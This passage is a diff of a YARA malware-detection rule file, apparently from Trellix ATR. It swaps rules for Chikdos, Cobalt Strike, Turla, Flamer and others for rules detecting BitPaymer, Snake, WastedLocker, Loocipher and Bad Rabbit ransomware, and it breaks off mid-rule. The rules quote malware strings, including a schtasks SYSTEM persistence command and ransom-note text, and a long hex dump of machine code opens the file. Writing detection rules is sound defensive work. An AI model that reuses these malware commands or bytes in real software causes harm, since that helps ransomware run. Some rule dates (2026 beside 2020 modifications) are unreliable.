00000074068B05000000000F6F000F7F4424080F77C3CCCCCCCCE9CBFFFFFFCCCCCCCCCCCCCCCCCCCCCCE9BBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C24048B442408874500C3CCCCCCCCE9EBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B4424040FBCC074058944240CC38B4424080FBCC0740883C0208944240CC3C744240C40000000C3CCCCCCCCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC83EC208B4424248B088B54242889CB01D1894C241C8B6804890424895C2404896C2408894C240C8B5C242C11DD896C2418896C2410E8160100000FB644241484C074C08B44241C894424308B4424188944243483C420C3CCCCCCCCCCCCCCCCCC83EC208B4424248B08894C24188B50048954241C890424894C2404895424088B5C2428895C240C8B6C242C896C2410E8BC0000000FB644241484C074C68B442418894424308B44241C8944243483C420C3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC8B5C24048B4424088B4C240CF00FB10B0F94442410C3CCCCCCCCCCCCCCCCCCCCE9DBFFFFFFCCCCCCCCCCCCCCCCCCCCCCE9EBFEFFFFCCCCCCCCCCCCCCCCCCCCCCE9DBFEFFFFCCCCCCCCCCCCCCCCCCCCCCE9DB000000CCCCCCCCCCCCCCCCCCCCCCE97B000000CCCCCCCCCCCCCCCCCCCCCCE9CB000000CCCCCCCCCCCCCCCCCCCCCCE9BBFEFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B2D000000008B4424088B54240C8B5C24108B4C2414F00FC74D000F94442418C3CCCCCC8B5C24048B4424088B4C240CF00FB10B0F94442410C3CCCCCCCCCCCCCCCCCCCC8B5C24048B44240889C1F00FC10301C88944240CC3CCCCCCCCCCCCCCCCCCCCCC8B5C24048B44240887038944240CC3CCE9EBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B5C24048B4424088703C3CCCCCCCCCC8B5C24048B4424088703C3CCCCCCCCCC8B442404A90700000074068B05000000008D5C24080F6F000F7F030F77C3CCCC8B442404A90700000074068B05000000000F6F4424080F7F000F77B800000000F00FC10424C3CCCCCCCCCCCCCCCCCCCC8B4424048A5C2408F00818C3CCCCCCCC8B4424048A5C2408F02018C3CCCCCCCC648B0D140000008B89000000003B610876098B4424088944240CC3E860550400EBDECCCCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240801000000E8AF4400008B44240C8944241C83C410C3E80E550400EBBCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240802000000E85F4400008B44240C8944241C83C410C3E8BE540400EBBCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240810000000E80F4400008B44240C8944241C83C410C3E86E540400EBBCCCCCCCCCCCCCCCCCCCCCCCCC83EC108D42048B008B4C2414890C248B4C2418894C240489442408E8D04300008B44240C8944241C83C410C3CCCCCCCC648B0D140000008B89000000003B6108762C83EC108B4424148B088B400489442408890C248B44241889442404E88E4300008B44240C8944241C83C410C3E8ED530400EBBBCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86B600000083EC108B442414F30F10000F57C90F2EC175060F8B860000000F2EC075027B5B648B05140000008B80000000008B40188B88940000008B909800000089909400000089CBC1E11131D989D331CAC1E90731D189DAC1EB1031CB8998980000008D041A8B4C241831C835A98E7FAA69C0CD76BAC28944241C83C410C38904248B44241889442404C744240804000000E8C74200008B44240C8944241C83C410C38B44241835A98E7FAA69C0CD76BAC28944241C83C410C3E80F530400E92AFFFFFFCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86B800000083EC108B442414F20F10000F57C9660F2EC175060F8B87000000660F2EC075027B5B648B05140000008B80000000008B40188B88940000008B909800000089909400000089CBC1E11131D989D331CAC1E90731D189DAC1EB1031CB8998980000008D041A8B4C241831C835A98E7FAA69C0CD76BAC28944241C83C410C38904248B44241889442404C744240808000000E8E54100008B44240C8944241C83C410C38B44241835A98E7FAA69C0CD76BAC28944241C83C410C3E82D520400E928FFFFFFCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108763C83EC0C8B44241084008904248B4C2414894C2404E815FEFFFF8B44241083C0048B4C2408890424894C2404E8FEFDFFFF8B4424088944241883C40CC3E8CD510400EBABCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108763C83EC0C8B44241084008904248B4C2414894C2404E895FEFFFF8B44241083C0088B4C2408890424894C2404E87EFEFFFF8B4424088944241883C40CC3E86D510400EBABCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86F200000083EC248B4424288B0885C974678B49048B59108B1385D274670FB6490FF6C120742983C0048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B40048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B44242C8944243083C424C3890C24E8B2FA03008B4424088B4C2404C70424000000008D15A279500089542404C744240818000000894C240C89442410E8F46603008B4424188B4C2414894C241C894424208D05C0D24E008904248D44241C89442404E81E8E00008B44240C8B4C2408890C2489442404E87A3602000F0BE853500400E9EEFEFFFFCCCCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86EF00000083EC248B4424288B0885C974648B59108B1385D274670FB6490FF6C120742983C0048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B40048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B44242C8944243083C424C3890C24E895F903008B4424088B4C2404C70424000000008D15A279500089542404C744240818000000894C240C89442410E8D76503008B4424188B4C2414894C241C894424208D05C0D24E008904248D44241C89442404E8018D00008B44240C8B4C2408890C2489442404E85D3502000F0BE8364F0400E9F1FEFFFFCC648B0D140000008B89000000003B61087606C644240C01C3 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of ( $s* ) and all of ( $op* ) or all of ( $p* )
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and all of them
 }
-rule TRELLIX_ARC_Chikdos_Malware_Pdb : DOS FILE
+rule TRELLIX_ARC_Bitpaymer_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Chikdos PDB"
+		description = "Rule to detect BitPaymer Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "0174ff2b-57fc-5578-b45e-c08bf8528ee8"
-		date = "2013-12-02"
+		id = "20b91cf2-2a84-55d9-8230-90d7b20a461f"
+		date = "2019-11-08"
 		modified = "2020-08-14"
-		reference = "http://hackermedicine.com/tag/trojan-chickdos/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_chickdos_pdb.yar#L1-L25"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/spanish-mssp-targeted-by-bitpaymer-ransomware/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Bitpaymer.yar#L1-L72"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "c2a0e9f8e880ac22098d550a74940b1d81bc9fda06cebcf67f74782e55e9d9cc"
-		logic_hash = "150bf809a61aad00df0c49fb6a609b909c84ffb9ca442e143a6c5bf3dfc39314"
+		logic_hash = "527cdbdf51e6f3f5d58e805cf4a1bc09c9d24880c2323046acef6ee03c92d62f"
 		score = 75
-		quality = 70
-		tags = "DOS, FILE"
+		quality = 66
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "dos"
-		malware_family = "Dos:W32/ChickDos"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/BitPaymer"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\IntergrateCHK\\Release\\IntergrateCHK.pdb"
+		$s1 = "IEncrypt.dll" fullword wide
+		$op0 = { e8 5f f3 ff ff ff b6 e0 }
+		$op1 = { e8 ad e3 ff ff 59 59 8b 75 08 8d 34 f5 38 eb 42 }
+		$op2 = { e9 45 ff ff ff 33 ff 8b 75 0c 6a 04 e8 c1 d1 ff }
+		$pdb = "S:\\Work\\_bin\\Release-Win32\\wp_encrypt.pdb" fullword ascii
+		$oj0 = { 39 74 24 34 75 53 8d 4c 24 18 e8 b8 d1 ff ff ba }
+		$oj1 = { 5f 8b c6 5e c2 08 00 56 8b f1 8d 4e 34 e8 91 af }
+		$oj2 = { 8b cb 8d bd 50 ff ff ff 8b c1 89 5f 04 99 83 c1 }
+		$t1 = ".C:\\aaa_TouchMeNot_.txt" fullword wide
+		$ok0 = { e8 b5 34 00 00 ff 74 24 18 8d 4c 24 54 e8 80 39 }
+		$ok1 = { 8b 5d 04 33 ff 8b 44 24 34 89 44 24 5c 85 db 7e }
+		$ok2 = { 55 55 ff 74 24 20 8d 4c 24 34 e8 31 bf 00 00 55 }
+		$random = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+" fullword ascii
+		$oi0 = { a1 04 30 ac 00 8b ce 0f af c2 03 c0 99 8b e8 89 }
+		$oi1 = { e8 64 a2 ff ff 85 c0 74 0c 8d 4d d8 51 ff 35 64 }
+		$oi2 = { c7 03 d4 21 ac 00 e8 86 53 00 00 89 73 10 89 7b }
+		$ou0 = { e8 64 a2 ff ff 85 c0 74 0c 8d 4d d8 51 ff 35 60 }
+		$ou1 = { a1 04 30 04 00 8b ce 0f af c2 03 c0 99 8b e8 89 }
+		$ou2 = { 8d 4c 24 10 e8 a0 da ff ff 68 d0 21 04 00 8d 4c }
+		$oa1 = { 56 52 ba 00 10 0c 00 8b f1 e8 28 63 00 00 8b c6 }
+		$oa2 = { 81 3d 50 30 0c 00 53 c6 d2 43 56 8b f1 75 23 ba }
+		$oy0 = { c7 06 cc 21 a6 00 c7 46 08 }
+		$oy1 = { c7 06 cc 21 a6 00 c7 46 08 }
+		$oy2 = { c7 06 cc 21 a6 00 c7 46 08 }
+		$oh1 = { e8 74 37 00 00 a3 00 30 fe 00 8d 4c 24 1c 8d 84 }
+		$oh2 = { 56 52 ba 00 10 fe 00 8b f1 e8 28 63 00 00 8b c6 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB ) and ( $s1 and all of ( $op* ) ) or ( $pdb and all of ( $oj* ) ) or ( $t1 and all of ( $ok* ) ) or ( $random and all of ( $oi* ) ) or ( $random and all of ( $ou* ) ) or ( $random and all of ( $oa* ) and $ou0 ) or ( $random and all of ( $oy* ) ) or ( $random and all of ( $oh* ) ) or ( $random and $ou0 ) or ( $random and $oi1 )
 }
-rule TRELLIX_ARC_MALW_Cobaltrike : BACKDOOR FILE
+rule TRELLIX_ARC_Snake_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect CobaltStrike beacon"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a7dae4c7-672e-58fb-8542-90fa90d991a4"
-		date = "2020-07-19"
-		modified = "2021-08-30"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_cobaltstrike.yar#L1-L38"
+		description = "Rule to detect Snake ransomware"
+		author = "McAfee ATR Team"
+		id = "b8f50af5-5568-5676-93a1-e818f08df0ce"
+		date = "2020-02-20"
+		modified = "2020-10-12"
+		reference = "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_snake_ransomware.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "fc91d40c6544c7ab7c60b3cb8fc542bd4a6fac79dbe00cad8f612854f2a6dcd1"
+		hash = "e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60"
+		logic_hash = "3ae64fbacbf886b8d09abc3f5f8eb9c8bff809909a251f2d055056e6d12217a2"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/CobaltStrike"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/EKANS"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash1 = "f47a627880bfa4a117fec8be74ab206690e5eb0e9050331292e032cd22883f5b"
 
 	strings:
-		$pattern_0 = { e9???????? eb0a b801000000 e9???????? }
-		$pattern_1 = { 3bc7 750d ff15???????? 3d33270000 }
-		$pattern_2 = { 8bd0 e8???????? 85c0 7e0e }
-		$pattern_3 = { 50 8d8d24efffff 51 e8???????? }
-		$pattern_4 = { 03b5d4eeffff 89b5c8eeffff 3bf7 72bd 3bf7 }
-		$pattern_5 = { 8b450c 8945f4 8d45f4 50 }
-		$pattern_6 = { 33c5 8945fc 8b4508 53 56 ff750c 33db }
-		$pattern_7 = { e8???????? e9???????? 833d????????01 7505 e8???????? }
-		$pattern_8 = { 53 53 8d85f4faffff 50 }
-		$pattern_9 = { 68???????? 53 50 e8???????? 83c424 }
-		$pattern_10 = { 488b4c2420 8b0401 8b4c2408 33c8 8bc1 89442408 }
-		$pattern_11 = { 488d4d97 e8???????? 4c8d9c24d0000000 418bc7 498b5b20 498b7328 498b7b30 }
-		$pattern_12 = { bd08000000 85d2 7459 ffcf 4d85ed }
-		$pattern_13 = { 4183c9ff 33d2 ff15???????? 4c63c0 4983f8ff }
-		$pattern_14 = { 49c1e002 e8???????? 03f3 4d8d349e 3bf5 7d13 }
-		$pattern_15 = { 752c 4c8d45af 488d55af 488d4d27 }
+		$snake = { 43 3A 2F 55 73 ?? 72 ?? 2F 57 49 4E 31 2F 67 6F 2F 73 ?? 63 2F 6A 6F 62 6E 68 62 67 6E 6E 69 66 70 6F 64 68 68 70 ?? 6D 66 2F 6E 66 64 6C 68 6F 70 68 6B 65 69 6A 61 64 67 66 64 64 69 6D 2F 6E 66 64 6C 68 6F 70 68 6B 65 69 6A 61 64 67 66 64 64 69 6D 2F 76 74 5F 73 74 ?? 69 6E 67 2E 67 6F 00 }
 
 	condition:
-		7 of them and filesize < 696320
+		( uint16( 0 ) == 0x5a4d and filesize < 11000KB ) and all of them
 }
-rule TRELLIX_ARC_Rietspoof_Loader : RANSOMWARE FILE
+rule TRELLIX_ARC_RANSOM_Wastedlocker : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the Rietspoof loader"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "f306e381-e2ae-528e-937b-aced72356d77"
-		date = "2026-02-01"
-		modified = "2020-08-14"
-		reference = "https://blog.avast.com/rietspoof-malware-increases-activity"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_rietspoof_loader.yar#L1-L22"
+		description = "Rule to detect unpacked samples of WastedLocker"
+		author = "McAfee ATR Team"
+		id = "900923cf-75c0-5342-858d-fe1ffa9486bd"
+		date = "2020-07-27"
+		modified = "2020-10-12"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_wastedlocker.yar#L1-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "d72b58ff452070e03d0b25bc433ef5c677df77dd440adc1ecdb592cee24235fb"
+		logic_hash = "c5adf88a46c34c8683d0e3d70529b352c77209f004e6c638ff079ea025921781"
 		score = 75
 		quality = 70
 		tags = "RANSOMWARE, FILE"
+		rule_version = "v1"
 		malware_type = "ransomware"
-		malware_family = "Loader:W32/Rietspoof"
+		malware_family = "Ransom:W32/WastedLocker"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "ae255679f487e2e9075ffd5e8c7836dd425229c1e3bd40cfc46fbbceceec7cf4"
 
 	strings:
-		$x1 = "\\Work\\d2Od7s43\\techloader\\loader" fullword ascii
+		$pattern_0 = { 8d45fc 50 53 53 6a19 ff75f8 }
+		$pattern_1 = { 66833b00 8bf3 0f8485000000 8b7d10 8b472c 85c0 7410 }
+		$pattern_2 = { e8???????? 8b4d08 8b4518 8d0441 6683600200 83c40c 837d1400 }
+		$pattern_3 = { 8701 e9???????? 8bc7 5f 5e 5b }
+		$pattern_4 = { 8bf8 3bfb 742f 53 8d45fc 50 56 }
+		$pattern_5 = { 6a10 8d45f0 6a00 50 e8???????? 83c40c 5e }
+		$pattern_6 = { 5f 5d c20800 55 8bec }
+		$pattern_7 = { 8d7e04 ff15???????? 85c0 8945e8 740e 2b4510 }
+		$pattern_8 = { ff15???????? 8b45dc 8b4dbc 69c00d661900 055ff36e3c 8945dc }
+		$pattern_9 = { 8b4d08 8b19 03d8 f7d0 c1c60f 03f2 0bc6 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		7 of them and filesize < 1806288
 }
-rule TRELLIX_ARC_Apt_Turla_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_Loocipher_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect a component of the APT Turla"
+		description = "Rule to detect Loocipher ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "b39ac7fc-16dd-559e-8ab0-76da5cbbc719"
-		date = "2017-05-31"
+		id = "d18efe09-4b04-5089-84f8-aead63fc19bb"
+		date = "2019-12-05"
 		modified = "2020-08-14"
-		reference = "https://attack.mitre.org/groups/G0010/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_turla_pdb.yar#L1-L25"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analysis-of-loocipher-a-new-ransomware-family-observed-this-year/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Loocipher.yar#L1-L46"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "3b8bd0a0c6069f2d27d759340721b78fd289f92e0a13965262fea4e8907af122"
-		logic_hash = "d519317c936a38f189bf0de908902ec4e3e079c8c7463c8881ceb332c0a82a26"
+		hash = "7720aa6eb206e589493e440fec8690ceef9e70b5e6712a9fec9208c03cac7ff0"
+		logic_hash = "36e452c34fd9bbb521f5422bffdbb71991de66f3faa29292dc3f27c8d7e1f9ba"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Turla"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Loocipher"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\Workshop\\Projects\\cobra\\carbon_system\\x64\\Release\\carbon_system.pdb"
+		$x1 = "c:\\users\\usuario\\desktop\\cryptolib\\gfpcrypt.h" fullword ascii
+		$x2 = "c:\\users\\usuario\\desktop\\cryptolib\\eccrypto.h" fullword ascii
+		$s3 = "c:\\users\\usuario\\desktop\\cryptolib\\gf2n.h" fullword ascii
+		$s4 = "c:\\users\\usuario\\desktop\\cryptolib\\queue.h" fullword ascii
+		$s5 = "ThreadUserTimer: GetThreadTimes failed with error " fullword ascii
+		$s6 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::operator *" fullword wide
+		$s7 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::operator +=" fullword wide
+		$s8 = "std::basic_string<unsigned short,struct std::char_traits<unsigned short>,class std::allocator<unsigned short> >::operator []" fullword wide
+		$s9 = "std::vector<struct CryptoPP::ProjectivePoint,class std::allocator<struct CryptoPP::ProjectivePoint> >::operator []" fullword wide
+		$s10 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::operator *" fullword wide
+		$s11 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::operator +=" fullword wide
+		$s12 = "std::vector<struct CryptoPP::WindowSlider,class std::allocator<struct CryptoPP::WindowSlider> >::operator []" fullword wide
+		$s13 = "std::istreambuf_iterator<char,struct std::char_traits<char> >::operator ++" fullword wide
+		$s14 = "std::istreambuf_iterator<char,struct std::char_traits<char> >::operator *" fullword wide
+		$s15 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::_Compat" fullword wide
+		$s16 = "std::vector<class CryptoPP::PolynomialMod2,class std::allocator<class CryptoPP::PolynomialMod2> >::operator []" fullword wide
+		$s17 = "DL_ElgamalLikeSignatureAlgorithm: this signature scheme does not support message recovery" fullword ascii
+		$s18 = "std::vector<struct CryptoPP::ECPPoint,class std::allocator<struct CryptoPP::ECPPoint> >::operator []" fullword wide
+		$s19 = "std::vector<struct CryptoPP::EC2NPoint,class std::allocator<struct CryptoPP::EC2NPoint> >::operator []" fullword wide
+		$s20 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::_Compat" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 650KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and ( 1 of ( $x* ) and 4 of them ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Apt_Flamer_Pdb : BACKDOOR FILE
+
+rule TRELLIX_ARC_Badbunny : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Flamer based on the PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "3bbe043d-c0dc-5aa2-b985-800a6d9038fd"
-		date = "2012-05-29"
+		description = "Bad Rabbit Ransomware"
+		author = "Christiaan Beek"
+		id = "190ee396-4c26-54f7-baac-bb45e3587488"
+		date = "2017-10-24"
 		modified = "2020-08-14"
-		reference = "https://www.forcepoint.com/ko/blog/x-labs/flameflamerskywiper-one-most-advanced-malware-found-yet"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/flamer_pdb.yar#L1-L25"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_BadRabbit.yar#L3-L47"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "554924ebdde8e68cb8d367b8e9a016c5908640954ec9fb936ece07ac4c5e1b75"
-		logic_hash = "3c1d3d015e086cff1f3d5add39397d8ed251b12144b31d8547165cbd0217735c"
+		logic_hash = "2879b8dc1ca0e86253354ac24b56d950878b23215b503da9b1d5faabd2c4bf9d"
 		score = 75
-		quality = 70
-		tags = "BACKDOOR, FILE"
+		quality = 45
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Flamer"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/BadRabbit"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93"
 
 	strings:
-		$pdb = "\\Projects\\Jimmy\\jimmydll_v2.0\\JimmyForClan\\Jimmy\\bin\\srelease\\jimmydll\\indsvc32.pdb"
+		$x1 = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" fullword wide
+		$x2 = "need to do is submit the payment and get the decryption password." fullword ascii
+		$s3 = "If you have already got the password, please enter it below." fullword ascii
+		$s4 = "dispci.exe" fullword wide
+		$s5 = "\\\\.\\GLOBALROOT\\ArcName\\multi(0)disk(0)rdisk(0)partition(1)" fullword wide
+		$s6 = "Run DECRYPT app at your desktop after system boot" fullword ascii
+		$s7 = "Enter password#1: " fullword wide
+		$s8 = "Enter password#2: " fullword wide
+		$s9 = "C:\\Windows\\cscc.dat" fullword wide
+		$s10 = "schtasks /Delete /F /TN %ws" fullword wide
+		$s11 = "Password#1: " fullword ascii
+		$s12 = "\\AppData" fullword wide
+		$s13 = "Disk decryption completed" fullword wide
+		$s14 = "Files decryption completed" fullword wide
+		$s15 = "http://diskcryptor.net/" fullword wide
+		$s16 = "Your personal installation key#1:" fullword ascii
+		$s17 = ".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg." wide
+		$s18 = "Disable your anti-virus and anti-malware programs" fullword wide
+		$s19 = "bootable partition not mounted" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and pe.imphash ( ) == "94f57453c539227031b918edd52fc7f1" and ( 1 of ( $x* ) or 4 of them ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Apt_Auriga_Driver : KERNELDRIVER FILE
+rule TRELLIX_ARC_Badrabbit_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the Auriga driver"
+		description = "Rule to detect Bad Rabbit Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "b61058a1-1b48-5be1-ba2f-74a7c3d38825"
-		date = "2013-03-13"
+		id = "d6e78c14-0913-5eed-be15-a6d1a8cd1a8d"
+		date = "2026-03-01"
 		modified = "2020-08-14"
-		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_auriga_biscuit.yar#L1-L39"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "207eee627a76449ac6d2ca43338d28087c8b184e7b7b50fdc60a11950c8283ec"
-		logic_hash = "c027073ba398fe89d418be67f0850c8d9e4d4c50a991c45b84cdb416497ccf1c"
-		score = 75
-		quality = 70
-		tags = "KERNELDRIVER, FILE"
-		rule_version = "v1"
-		malware_type = "kerneldriver"
-		malware_family = "Driver:W32/Auriga"
-		actor_type = "APT"
-		actor_group = "APT1"
-
-	strings:
-		$s1 = "\\SystemRoot\\System32\\netui.dll" fullword wide
-		$s2 = "\\SystemRoot\\System32\\drivers\\riodrv32.sys" fullword wide
-		$s3 = "\\SystemRoot\\System32\\arp.exe" fullword wide
-		$s4 = "netui.dll" fullword ascii
-		$s5 = "riodrv32.sys" fullword wide
-		$s6 = "\\netui.dll" fullword wide
-		$s7 = "d:\\drizt\\projects\\auriga\\branches\\stone_~1\\server\\exe\\i386\\riodrv32.pdb" fullword ascii
-		$s8 = "\\riodrv32.sys" fullword wide
-		$s9 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\riodrv32" fullword wide
-		$s10 = "\\DosDevices\\rio32drv" fullword wide
-		$s11 = "e\\Driver\\nsiproxy" fullword wide
-		$s12 = "(C) S3/Diamond Multimedia Systems. All rights reserved." fullword wide
-		$s13 = "\\Device\\rio32drv" fullword wide
-		$s14 = "\\Registry\\Machine\\SOFTWARE\\riodrv" fullword wide
-		$s15 = "\\Registry\\Machine\\SOFTWARE\\riodrv32" fullword wide
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
-}
-rule TRELLIX_ARC_Hermeticwiper : TROJAN FILE
-{
-	meta:
-		description = "Detecting variants of Hermetic Wiper malware discovered in UA"
-		author = " cb @ Trellix ATR"
-		id = "fc6d9238-b732-541d-b083-11b43fe8770d"
-		date = "2022-02-24"
-		modified = "2022-02-24"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Troj_HermWiper.yar#L1-L27"
+		reference = "https://securelist.com/bad-rabbit-ransomware/82851/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_BadRabbit.yar#L49-L101"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "b48e91afa19e09c7035ccda1b9293448e834d612b9a953b593f9412acb78faac"
+		logic_hash = "7536f021ce7fede0f1a2bf2f4ebc7d6e7269a6dd63005cab1fc6a309a71c61c0"
 		score = 75
-		quality = 70
-		tags = "TROJAN, FILE"
-		rule_version = "v1"
-		malware_type = "Trojan"
+		quality = 43
+		tags = "RANSOMWARE, FILE"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/BadRabbit"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
